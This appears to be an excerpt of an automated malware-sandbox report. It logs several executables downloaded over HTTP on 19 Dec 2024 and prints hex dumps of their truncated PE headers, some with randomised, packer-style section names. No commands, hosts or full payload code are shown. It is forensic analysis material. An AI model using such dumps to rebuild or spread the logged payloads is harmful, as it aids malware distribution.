2a 00 00 3a 2b 05 28 f1 af 5e 41 00 28 21 0d 00 06 2a 00 12 00 00 00 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 13 30 03 00 92 00 00 00 01 00 00 11 28 2a 0c 00 06 38 79 00 00 00 fe 0c 00 00 45 03 00 00 00 63 00 00 00 4f 00 00 00 2f 00 00 00 38 5e 00 00 00 73 17 00 00 0a 80 04 00 00 04 20 01 00 00 00 17 3a d5 ff ff ff 26 38 cb ff ff ff 73 18 00 00 0a 80 03 00 00 04 38 d6 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 00 00 00 00 17 39 ab ff ff ff 26 20 00 00 00 00 38 a0 ff ff ff 73 1a 00 00 0a 80 05 00 00 04 20 02 00 00 00 38 8c ff ff ff 2a 73 1b 00 00 0a 80 02 00 00 04 38 ad ff ff ff 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:08 GMTContent-Type: application/octet-streamContent-Length: 1880576Last-Modified: Wed, 18 Dec 2024 18:02:50 GMTConnection: keep-aliveETag: "67630e4a-1cb200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 69 eb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6e 75 7a 76 6c 68 65 00 30 1a 00 00 f0 2f 00 00 2e 1a 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 7a 75 74 74 61 6e 78 00 10 00 00 00 20 4a 00 00 04 00 00 00 8c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 90 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:17 GMTContent-Type: application/octet-streamContent-Length: 4462080Last-Modified: Thu, 19 Dec 2024 08:25:21 GMTConnection: keep-aliveETag: "6763d871-441600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 99 62 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 44 49 00 00 24 6c 00 00 32 00 00 00 c0 bd 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 bd 00 00 04 00 00 db 70 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 69 00 73 00 00 00 00 80 69 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 ae bd 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ad bd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 69 00 00 10 00 00 00 48 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 69 00 00 02 00 00 00 58 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 69 00 00 02 00 00 00 5a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 38 00 00 a0 69 00 00 02 00 00 00 5c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 78 79 6d 6b 6c 63 00 90 1b 00 00 20 a2 00 00 90 1b 00 00 5e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 77 72 73 71 73 68 72 00 10 00 00 00 b0 bd 00 00 06 00 00 00 ee 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 bd 00 00 22 00 00 00 f4 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 